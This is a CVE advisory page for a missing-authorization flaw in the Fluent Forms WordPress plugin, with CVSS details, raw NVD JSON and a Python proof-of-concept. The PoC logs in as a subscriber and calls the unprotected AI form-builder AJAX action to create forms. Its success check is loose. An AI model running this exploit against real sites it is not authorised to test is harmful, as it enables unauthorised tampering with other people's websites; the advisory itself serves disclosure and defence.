Security Vulnerability Report
中文
CVE-2025-13722 CVSS 5.3 MEDIUM

CVE-2025-13722

Published: 2026-01-07 12:16:50
Last Modified: 2026-04-15 00:35:42

Description

The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.1.7. This is due to missing capability checks on the `fluentform_ai_create_form` AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary forms via the publicly exposed AI builder.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Fluent Forms WordPress插件 < 6.1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13722 PoC - Fluent Forms Missing Authorization # Target: WordPress site with Fluent Forms plugin < 6.1.8 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber' password = sys.argv[3] if len(sys.argv) > 3 else 'password' session = requests.Session() # Step 1: Login to WordPress login_url = f'{target}/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f'{target}/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) print(f'[+] Login attempt: {"Success" if "wordpress_logged_in" in str(session.cookies) else "Failed"}') # Step 2: Exploit the missing authorization vulnerability ajax_url = f'{target}/wp-admin/admin-ajax.php' exploit_data = { 'action': 'fluentform_ai_create_form', 'form_name': 'Malicious Form', 'form_description': 'This form was created via CVE-2025-13722', 'form_fields': '{"type":"input_text","name":"test","label":"Test Field"}', 'ai_settings': '{"style":"default"}' } response = session.post(ajax_url, data=exploit_data) print(f'[+] Exploit sent to {ajax_url}') print(f'[+] Response status: {response.status_code}') print(f'[+] Response: {response.text[:500]}') if 'success' in response.text.lower() or 'form' in response.text.lower(): print('[+] Form creation may have succeeded!') else: print('[-] Exploit may have failed or target is not vulnerable')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13722", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:49.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.1.7. This is due to missing capability checks on the `fluentform_ai_create_form` AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary forms via the publicly exposed AI builder."}, {"lang": "es", "value": "El plugin Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder para WordPress es vulnerable a la falta de autorización en todas las versiones hasta la 6.1.7, inclusive. Esto se debe a la falta de comprobaciones de capacidad en la acción AJAX 'fluentform_ai_create_form'. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, creen formularios arbitrarios a través del constructor de IA expuesto públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Ai/AiFormBuilder.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f7dbf179-7099-4dfb-8dad-780f996a7005?source=cve", "source": "[email protected]"}]}}